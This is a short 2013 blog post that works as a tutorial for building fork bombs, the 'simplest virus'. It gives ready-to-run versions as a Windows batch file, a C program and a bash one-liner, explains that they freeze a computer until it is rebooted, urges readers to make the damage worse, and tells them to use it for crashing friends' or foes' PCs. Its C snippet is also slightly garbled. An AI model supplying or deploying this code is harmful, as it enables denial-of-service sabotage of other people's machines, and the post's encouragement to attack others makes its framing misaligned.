Monday 13 May 2013

How To Make The Simplest Virus – Fork Bomb [Hacks]


How To Make The Simplest Virus – Fork Bomb [Hacks]


Launching fork bomb will lead to total CPU jam by opening about 500 process of command prompt CPU usage will be overloaded and computer will freeze.
1) Launch notepad and type

Batch Fork Bomb

 %0|%0
2) Save as .bat , for example fork.bat
3) Launch .bat file that you created in step 2 , once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation.

C Fork Bomb

Here is a in C++ version of Fork bomb.
#include
int main(void)
{
  while(1)
   fork();
  return 0;
}

Shell Script Fork Bomb

And a shell (Unix/bash) version.
 : (){ : |:& };:
Once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation. Stopping a fork bomb requires destroying all running instances of it. Trying to use a program to kill the rogue processes normally requires creating another process a difficult or impossible task as it will totally use memory for its instances.
You can get creative and try to use program executables or call system applications or utilities recursively in the same manner and increase the damage manifolds. Let your creativity run loose.
Use it for crashing your friends/foe’s PC
................................................................................
Enjoy...(Y)
And feel free to comment...

1 comment: